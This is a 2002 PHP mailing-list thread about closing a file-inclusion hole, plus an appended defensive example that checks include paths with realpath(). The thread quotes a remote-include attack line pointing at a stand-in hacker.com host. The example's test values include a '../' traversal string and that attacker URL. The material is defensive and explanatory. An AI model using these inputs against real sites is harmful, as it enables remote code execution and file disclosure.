That would not help you if you include files based on unchecked user input.
Justin French wrote:

>all my include files are *.inc, and I have a .htaccess file that makes
>apache refuse to serve those files directly thru http.
>
>Justin
>
>
>on 04/10/02 7:58 PM, John Wards ([EMAIL PROTECTED]) wrote:
>
>>erm......would that allow hackers access? Say I have a database include file
>>would hackers be able to get access to my database like this?
>>
>>(include('http://mysite.com/datainc.php');)
>>
>>I hope bloody not!!! if so how on earth do i get round that!
>>
>>John
>>
>>On Friday 04 Oct 2002 10:52 am, Marek Kilimajer wrote:
>>
>>>Use realpath() to check the path. I also suspect your script is
>>>vulnerable to cross-site includes
>>>(include('http://hacker.com/script.inc');)
>>>
>>>Rick Beckman wrote:
>>>
>>>>Okay, I was mistaken... There is a gaping security hole in my simple li'l
>>>>script... How do I modify it to only accept files from a certain path? I
>>>>want the url format to be script.php?call=1 where "1" is the called file
>>>>in the /includes/ directory. Just when I get optimistic I leave the
>>>>entire system exposed. Yeah, that fits with my luck. :-)
>>>>
>>--
>>PHP General Mailing List (http://www.php.net/)
>>To unsubscribe, visit: http://www.php.net/unsub.php
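
An added example, not part of the original thread: one way to apply the realpath() check suggested above to the script.php?call=1 layout, so that only files inside the includes directory can be loaded. The function name resolve_include(), the .inc suffix and the temporary sample directory are assumptions made for illustration.

```php
<?php
// Added example; resolve_include() and the sample layout are hypothetical.

function resolve_include(string $baseDir, string $call): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;                      // includes directory is missing
    }
    // realpath() collapses ".." and symlinks and returns false when the
    // target does not exist, which also covers URL-style input.
    $target = realpath($base . DIRECTORY_SEPARATOR . $call . '.inc');
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Compare against the base plus a trailing separator so a sibling such
    // as "/includes-old/x.inc" cannot pass as being inside "/includes".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed sample layout: one allowed file, one file outside the directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inc_demo_' . getmypid();
@mkdir($root . '/includes', 0700, true);
file_put_contents($root . '/includes/1.inc', "<?php echo 'page one'; ?>");
file_put_contents($root . '/datainc.inc', "<?php /* db settings */ ?>");

// Constructed values for the "call" parameter.
$cases = ['1', '../datainc', 'http://hacker.com/script', 'missing'];
foreach ($cases as $call) {
    $path = resolve_include($root . '/includes', $call);
    printf("%-26s => %s\n", $call, $path === null ? 'rejected' : 'allowed');
}

// In the real script the result gates the include:
//   $path = resolve_include(__DIR__ . '/includes', $_GET['call'] ?? '');
//   if ($path === null) { http_response_code(404); exit; }
//   include $path;

// Remove the constructed sample files.
unlink($root . '/includes/1.inc');
unlink($root . '/datainc.inc');
rmdir($root . '/includes');
rmdir($root);
```

Only the first case is allowed; "../datainc" resolves to a real file but fails the prefix comparison, which is the case the .htaccess rule alone does not cover.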